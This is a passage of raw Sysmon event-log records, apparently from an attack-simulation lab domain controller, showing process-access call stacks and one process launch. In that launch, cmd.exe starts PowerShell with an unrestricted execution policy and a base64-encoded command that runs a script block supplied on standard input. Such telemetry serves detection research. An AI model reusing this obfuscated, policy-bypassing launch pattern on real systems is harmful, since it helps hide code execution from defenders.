em32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7C3D-5FA1-FA02-000000008701}36364104C:\Windows\system32\cmd.exe{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.344{D28789B6-7C3D-5FA1-FB02-000000008701}3472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3D-5FA1-FA02-000000008701}3636C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.341{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3D-5FA1-FA02-000000008701}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 